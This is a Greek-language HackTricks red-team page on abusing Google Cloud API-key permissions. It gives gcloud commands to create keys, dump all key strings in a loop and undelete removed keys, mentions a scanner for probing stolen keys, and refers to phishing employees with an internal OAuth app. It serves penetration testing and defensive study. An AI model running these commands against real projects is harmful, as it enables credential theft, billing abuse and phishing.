GCP - Apikeys Privesc

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον επαγγελματία με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Κλειδιά API

Οι παρακάτω άδειες είναι χρήσιμες για τη δημιουργία και την κλοπή κλειδιών API, όχι αυτών που περιγράφονται στα έγγραφα: Ένα κλειδί API είναι ένα απλό κρυπτογραφημένο αλφαριθμητικό που αναγνωρίζει μια εφαρμογή χωρίς κανέναν αρχηγό. Είναι χρήσιμα για την πρόσβαση σε δημόσια δεδομένα ανώνυμα και χρησιμοποιούνται για να συσχετίσουν τα αιτήματα API με το έργο σας για ποσοστό και χρέωση.

Συνεπώς, με ένα κλειδί API μπορείτε να κάνετε την εταιρεία να πληρώσει για τη χρήση του API, αλλά δεν θα μπορείτε να ανεβάσετε τα προνόμια.

Για περισσότερες πληροφορίες σχετικά με τα κλειδιά API, ελέγξτε:

GCP - API Keys Enum

Για άλλους τρόπους δημιουργίας κλειδιών API, ελέγξτε:

GCP - Serviceusage Privesc

Επίθεση Brute Force στην πρόσβαση με Κλειδιά API

Καθώς μπορεί να μην γνωρίζετε ποια APIs είναι ενεργοποιημένα στο έργο ή ποιοι περιορισμοί έχουν επιβληθεί στο κλειδί API που βρήκατε, θα ήταν ενδιαφέρον να εκτελέσετε το εργαλείο https://github.com/ozguralp/gmapsapiscanner και να ελέγξετε τι μπορείτε να αποκτήσετε πρόσβαση με το κλειδί API.

apikeys.keys.create

Αυτή η άδεια επιτρέπει τη δημιουργία ενός κλειδιού API:

gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευπάθους περιβάλλοντος εδώ.

Σημειώστε ότι από προεπιλογή οι χρήστες έχουν δικαιώματα για τη δημιουργία νέων έργων και τους ανατίθεται ο ρόλος Κάτοχος στο νέο έργο. Έτσι, ένας χρήστης μπορεί να δημιουργήσει ένα έργο και ένα κλειδί API μέσα σε αυτό το έργο.

apikeys.keys.getKeyString , apikeys.keys.list

Αυτές οι άδειες επιτρέπουν την λίστα και την ανάκτηση όλων των κλειδιών API και την ανάκτηση του κλειδιού.

for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευπάθους περιβάλλοντος εδώ.

apikeys.keys.undelete , apikeys.keys.list

Αυτές οι άδειες σας επιτρέπουν να καταλογογραφήσετε και να αναγεννήσετε διαγραμμένα κλειδιά API. Το κλειδί API δίνεται στην έξοδο μετά την ολοκλήρωση της εντολής undelete:

gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

Δημιουργία εσωτερικής εφαρμογής OAuth για phishing άλλων εργαζομένων

Ελέγξτε την ακόλουθη σελίδα για να μάθετε πώς να το κάνετε αυτό, αν και αυτή η ενέργεια ανήκει στην υπηρεσία clientauthconfig σύμφωνα με τα έγγραφα:

GWS - Google Platforms Phishing
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated